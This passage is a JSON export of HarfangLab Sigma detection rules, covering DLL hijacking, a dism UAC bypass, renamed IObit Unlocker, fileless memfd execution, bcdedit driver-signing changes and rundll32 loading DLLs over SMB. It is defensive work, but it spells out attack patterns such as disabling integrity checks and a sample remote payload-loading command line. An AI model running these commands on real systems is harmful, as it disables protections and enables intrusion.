'?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84a338af-c81a-4279-b01a-f93486efc9ea",
"rule_name": "DLL Hijacking via dcdiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dcdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84a4a652-d451-45f3-bbdd-9b17f02d3387",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.521951Z",
"creation_date": "2026-03-23T11:45:34.093191Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093205Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_dismcore.yml",
"content": "title: UAC Bypass Executed via dism\nid: 84a4a652-d451-45f3-bbdd-9b17f02d3387\ndescription: |\n Detects the execution of the dism.exe/dismhost.exe UAC bypass, involving the hijacking of the dismcore.dll or api-ms-win-core-kernel32-legacy-l1.dll DLLs.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the creation of the DLL to look for malicious content or actions.\nreferences:\n - https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_dism:\n Image: '?:\\Windows\\System32\\dism.exe'\n ImageLoaded|endswith: '\\dismcore.dll'\n\n selection_dismhost:\n Image|endswith: '\\DismHost.exe'\n ImageLoaded|endswith: '\\api-ms-win-core-kernel32-legacy-l1.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n exclusion_manageengine:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcpatchscan.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84a4a652-d451-45f3-bbdd-9b17f02d3387",
"rule_name": "UAC Bypass Executed via dism",
"rule_description": "Detects the execution of the dism.exe/dismhost.exe UAC bypass, involving the hijacking of the dismcore.dll or api-ms-win-core-kernel32-legacy-l1.dll DLLs.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the creation of the DLL to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-10",
"rule_modified_date": "2026-03-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84b51994-8a90-450f-aa06-cf5f5cac2232",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627232Z",
"creation_date": "2026-03-23T11:45:34.627234Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627238Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.reliaquest.com/blog/double-extortion-attack-analysis/",
"https://www.iobit.com/fr/iobit-unlocker.php",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_execution_of_renamed_iobitunlocker.yml",
"content": "title: Execution of Renamed IObit Unlocker\nid: 84b51994-8a90-450f-aa06-cf5f5cac2232\ndescription: |\n Detects the execution of a renamed IObit Unlocker, a tool that may be exploited by adversaries to disable or modify security tools to avoid detection of malicious activities.\n IObit Unlocker is a legitimate utility designed to remove locked files or folders, but its use can indicate unauthorized attempts to circumvent security measures.\n It is recommended to verify if the execution of IObit Unlocker is authorized, investigate the process for malicious behavior, check file integrity, and monitor for suspicious modifications to security-related tools or processes.\nreferences:\n - https://www.reliaquest.com/blog/double-extortion-attack-analysis/\n - https://www.iobit.com/fr/iobit-unlocker.php\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/09/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.IOBitUnlocker\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Description: 'Unlocker'\n - Product: 'Unlocker'\n\n selection_company:\n Company|contains: 'IObit'\n\n selection_signature:\n ProcessSigned: 'true'\n ProcessSignature: 'IObit CO., LTD'\n\n # This is handled by the rule 74259026-c475-45cc-bac2-fb2a5768e419\n filter_image:\n Image|endswith: '\\IObitUnlocker.exe'\n\n condition: selection and 1 of selection_* and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84b51994-8a90-450f-aa06-cf5f5cac2232",
"rule_name": "Execution of Renamed IObit Unlocker",
"rule_description": "Detects the execution of a renamed IObit Unlocker, a tool that may be exploited by adversaries to disable or modify security tools to avoid detection of malicious activities.\nIObit Unlocker is a legitimate utility designed to remove locked files or folders, but its use can indicate unauthorized attempts to circumvent security measures.\nIt is recommended to verify if the execution of IObit Unlocker is authorized, investigate the process for malicious behavior, check file integrity, and monitor for suspicious modifications to security-related tools or processes.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84ceb67c-e594-4e0c-9494-ecacb9897967",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588446Z",
"creation_date": "2026-03-23T11:45:34.588450Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588457Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wksprt.yml",
"content": "title: DLL Hijacking via wksprt.exe\nid: 84ceb67c-e594-4e0c-9494-ecacb9897967\ndescription: |\n Detects potential Windows DLL Hijacking via wksprt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wksprt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\webservices.dll'\n - '\\WININET.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84ceb67c-e594-4e0c-9494-ecacb9897967",
"rule_name": "DLL Hijacking via wksprt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wksprt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "84e95c4d-07d4-49bc-90f2-6545f7ef9b88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074540Z",
"creation_date": "2026-03-23T11:45:34.074542Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074547Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/declawing-pumakit",
"https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html",
"https://man7.org/linux/man-pages/man2/memfd_create.2.html",
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_fileless_execution_using_memfd.yml",
"content": "title: Fileless Process Execution via Memfd\nid: 84e95c4d-07d4-49bc-90f2-6545f7ef9b88\ndescription: |\n Detects the execution of a process with an anonymous image file created via \"memfd_create()\".\n The \"memfd_create()\" syscall creates an anonymous file that lives in RAM and has a volatile backing storage.\n Once all references to the file are dropped, it is automatically released.\n This method, called fileless execution, is typically used by malware to avoid signature-based detection from common security tools.\n It is recommended to ensure that both the process and its parent had a legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://www.elastic.co/security-labs/declawing-pumakit\n - https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html\n - https://man7.org/linux/man-pages/man2/memfd_create.2.html\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/11/18\nmodified: 2025/11/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.MemoryExecution\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|startswith: 'memfd:'\n\n exclusion_lxc:\n Image: 'memfd:lxc-attach'\n\n exclusion_containers:\n Ancestors|contains:\n # Containerd\n - 'bin/containerd-shim'\n # Docker\n - 'bin/docker-containerd-shim'\n - '/usr/bin/dockerd'\n - '|/usr/sbin/dockerd|'\n - '/usr/libexec/docker/docker-runc-current'\n # An OCI container runtime monitor.\n - '/usr/bin/conmon'\n # Open source tool for developing, managing, and running containers.\n - '/usr/bin/podman'\n # The NVIDIA Container Toolkit is a collection of libraries and utilities enabling users to build and run GPU-accelerated containers.\n - 'bin/nvidia-container-cli'\n\n exclusion_image:\n Image:\n - 'memfd:buildah-chroot-exec'\n - 'memfd:buildah-chroot-runtime'\n 
- 'memfd:dwarfs'\n - 'memfd:runc_cloned:/proc/self/exe'\n - 'memfd:crun_cloned:/proc/self/exe'\n\n exclusion_runtime:\n Image: 'memfd:runtime'\n ParentImage:\n - '*/usr/lib/x86_64-linux-gnu/appimagelauncher/binfmt-bypass'\n - '/usr/lib/systemd/systemd'\n\n exclusion_self:\n Image: 'memfd:crun_cloned:/proc/self/exe'\n GrandparentImage:\n - '/usr/libexec/gnome-terminal-server'\n - '/usr/share/code/code'\n\n exclusion_datadog:\n Image: 'memfd:spawn_worker_trampoline'\n CommandLine|startswith: 'datadog-ipc-helper'\n\n exclusion_zen_browser:\n - Image:\n - 'memfd:exec'\n - 'memfd:squashfuse'\n CommandLine|contains: 'squashfuse */zen-x86_64.AppImage *'\n - Image:\n - 'memfd:squashfuse'\n - 'memfd:unsquashfs'\n ParentImage|endswith: '/zen-browser'\n\n exclusion_crun:\n ProcessImage: 'memfd:runc_cloned:/proc/self/exe'\n ProcessCommandLine|startswith: '/usr/bin/crun '\n\n exclusion_sophos:\n ProcessImage: 'memfd:/sophos-subprocess-*-exec?'\n ProcessCommandLine:\n - 'runtimedetections-trigger'\n - '/opt/sophos-spl/plugins/runtimedetections/bin/perf-sensor'\n\n exclusion_fireeye:\n ProcessImage: 'memfd:/capsule?-sensor-*-exec?'\n ProcessCommandLine: '/opt/fireeye/bin/perf-sensor'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "84e95c4d-07d4-49bc-90f2-6545f7ef9b88",
"rule_name": "Fileless Process Execution via Memfd",
"rule_description": "Detects the execution of a process with an anonymous image file created via \"memfd_create()\".\nThe \"memfd_create()\" syscall creates an anonymous file that lives in RAM and has a volatile backing storage.\nOnce all references to the file are dropped, it is automatically released.\nThis method, called fileless execution, is typically used by malware to avoid signature-based detection from common security tools.\nIt is recommended to ensure that both the process and its parent had a legitimate reason to do so and that the host wasn't compromised.\n",
"rule_creation_date": "2024-11-18",
"rule_modified_date": "2025-11-07",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8539d06a-adc8-4186-8389-94ced1b1912e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070775Z",
"creation_date": "2026-03-23T11:45:34.070778Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070783Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set",
"https://attack.mitre.org/techniques/T1562/"
],
"name": "t1562_004_disable_driver_signature_check_bcdedit.yml",
"content": "title: Driver Signature Check Setting Altered via bcdedit\nid: 8539d06a-adc8-4186-8389-94ced1b1912e\ndescription: |\n Detects when the driver signature check is disabled using bcdedit.\n Attackers may disable driver signature check or enable test signing in order to load unsigned malicious drivers.\n It is recommended to check if this action is expected on this machine, and to investigate if any unsigned drivers have been loaded after this action.\nreferences:\n - https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option\n - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set\n - https://attack.mitre.org/techniques/T1562/\ndate: 2022/04/12\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562\n - attack.t1553\n - attack.t1553.002\n - attack.t1553.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\n\ndetection:\n selection_bcdedit:\n - Image|endswith: '\\bcdedit.exe'\n - OriginalFileName: 'bcdedit.exe'\n\n selection_set:\n CommandLine|contains:\n - '/set'\n - '-set'\n\n selection_set_testsigning:\n CommandLine|contains|all:\n - 'testsigning'\n - ' on'\n\n selection_set_loadoptions:\n CommandLine|contains|all:\n - 'loadoptions'\n - 'DISABLE_INTEGRITY_CHECKS'\n\n selection_set_integrity:\n CommandLine|contains|all:\n - 'nointegritychecks'\n - ' on'\n\n condition: selection_bcdedit and selection_set and 1 of selection_set_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8539d06a-adc8-4186-8389-94ced1b1912e",
"rule_name": "Driver Signature Check Setting Altered via bcdedit",
"rule_description": "Detects when the driver signature check is disabled using bcdedit.\nAttackers may disable driver signature check or enable test signing in order to load unsigned malicious drivers.\nIt is recommended to check if this action is expected on this machine, and to investigate if any unsigned drivers have been loaded after this action.\n",
"rule_creation_date": "2022-04-12",
"rule_modified_date": "2025-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553",
"attack.t1553.002",
"attack.t1553.006",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8551ce78-7ac5-492b-96e4-b91d4ec83477",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070331Z",
"creation_date": "2026-03-23T11:45:34.070333Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070337Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Rundll32/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_load_dll_smb.yml",
"content": "title: Suspicious DLL Loaded from SMB Share\nid: 8551ce78-7ac5-492b-96e4-b91d4ec83477\ndescription: |\n Detects a suspicious loading of DLL from an SMB Share by rundll32.\n Attackers can use this technique to evade detection.\n It is recommended to investigate the loaded DLL and the parent process for suspicious activities.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Rundll32/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/11/03\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe \\\\10.10.10.10\\share\\payload.dll,EntryPoint\n selection_1:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_2:\n CommandLine|contains: ' \\\\\\\\*\\'\n\n filter_smb_share_arg:\n CommandLine|contains: ' ?:\\\\*,* \\\\\\\\*\\'\n\n exclusion_cmd:\n CommandLine|contains:\n - 'printui.dll?PrintUIEntry'\n - 'printui.dll, PrintUIEntry '\n - 'printui,PrintUIEntry '\n - 'printui.dll , PrintUIEntry '\n - 'rundll32.exe ?:\\Windows\\System32\\mshtml.dll,PrintHTML'\n - ' ?:\\Windows\\system32\\shell32.dll,OpenAs_RunDLL '\n - ' ?:\\Program Files\\Windows Photo Viewer\\PhotoAcq.dll,PhotoAndVideoAcquire '\n - ' ?:\\WINDOWS\\system32\\spool\\DRIVERS\\\\*\\3\\hp*,MonitorPrintJobStatus /pjob='\n - ' ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\3\\hp*.dll,CheckDevice /pname'\n - ' ?:\\windows\\system32\\dsquery.dll,OpenSavedDsQuery '\n - 'rundll32 url,FileProtocolHandler '\n # rundll32.exe C:\\\\windows\\\\system32\\\\newdev.dll,pDiDeviceInstallNotification \\\\\\\\.\\\\pipe\\\\PNP_Device_Install_Pipe_1.{93b03590-a1d5-469b-8258-bb3ccd6f4c44} (null)\n # rundll32.exe C:\\\\Windows\\\\system32\\\\hotplug.dll,HotPlugSafeRemovalNotification 
\\\\\\\\.\\\\pipe\\\\PNP_HotPlug_Pipe_1.{c8a2ee35-7f69-46a5-a06c-aee47a969b35}\n - '\\Windows\\system32\\\\*\\\\\\\\.\\pipe\\'\n # C:\\WINDOWS\\system32\\rundll32.exe fdprint,InvokeTask /ss \\\\?\\USB#VID_04F9&PID_03B7&MI_01#6&13fbb565&0&0001#{6bdd1fc6-810f-11d0-bec7-08002be2092f}\n - 'rundll32.exe fdprint,InvokeTask /ss'\n - 'rundll32.exe cryptext.dll,CryptExt' # CryptExtOpenCER / CryptExtAddPFX / CryptExtOpenPKCS7\n - '?:\\windows\\system32\\rundll32.exe ?:\\windows\\system32\\cryptext.dll,'\n - '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\system32\\spool\\DRIVERS\\\\*\\3\\cnmsm??.dll,StatusMonitorEntryPoint'\n - 'rundll32 ?:\\windows\\system32\\spool\\DRIVERS\\\\*\\3\\ssnetmon.d64,StatusMonitor '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll'\n - 'rundll32.exe ?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\NalShell.dll,NalExplorerExecuteShortcut '\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\FirewallControlPanel.dll,ShowNotificationDialog '\n - 'rundll32.exe url.dll,FileProtocolHandler '\n - 'rundll32 url.dll,FileProtocolHandler '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\dfshim.dll,ShOpenVerbApplication '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\dfshim.dll,ShOpenVerbShortcut '\n - 'rundll32.exe dfshim.dll,ShOpenVerbApplication '\n - 'rundll32.exe ?:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\vstoee.dll,InstallVstoSolution '\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll*ImageView_Fullscreen'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\shimgvw.dll'\n - 'rundll32.exe ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\X64'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files\\CopyTrans HEIC for Windows\\CopyTransHEICforWindows.dll'\n - 'RUNDLL32.EXE ?:\\program files (x86)\\hp\\digital imaging\\bin\\hpslpsvc64.dll'\n - '?:\\windows\\system32\\rundll32.exe 
fdprint,InvokeTask'\n - '?:\\Windows\\System32\\rundll32.exe shell32.dll,OpenAs_RunDLL'\n - 'rundll32 SHELL32.dll,ShellExec_RunDLL'\n\n exclusion_tsworkspace:\n CommandLine|startswith: '?:\\Windows\\system32\\rundll32.exe tsworkspace,WorkspaceSilentSetup'\n\n exclusion_distant_epson:\n CommandLine|startswith:\n - 'rundll32.exe *\\Epson DS-530\\\\*\\E_UPWJ??.DLL,EPGetVersionEx /LOG:?:\\Users\\\\*\\AppData\\Local\\Temp\\EPSON'\n - 'rundll32.exe *\\Scanner Epson DS-530\\\\*\\E_UPWJ??.DLL,EPGetVersionEx /LOG:?:\\Users\\\\*\\AppData\\Local\\Temp\\EPSON'\n\n exclusion_ibm:\n CommandLine|startswith: 'rundll32.exe *\\IBMi - ACS and Co\\IBMiAccess_v1r1\\Start_Programs\\Windows_x86-64\\acsnative.dll, LunarModule'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8551ce78-7ac5-492b-96e4-b91d4ec83477",
"rule_name": "Suspicious DLL Loaded from SMB Share",
"rule_description": "Detects suspicious loading of a DLL from an SMB share by rundll32.\nAttackers can use this technique to evade detection.\nIt is recommended to investigate the loaded DLL and the parent process for suspicious activities.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8561d1d1-ea2a-4b93-a802-bdc392662355",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
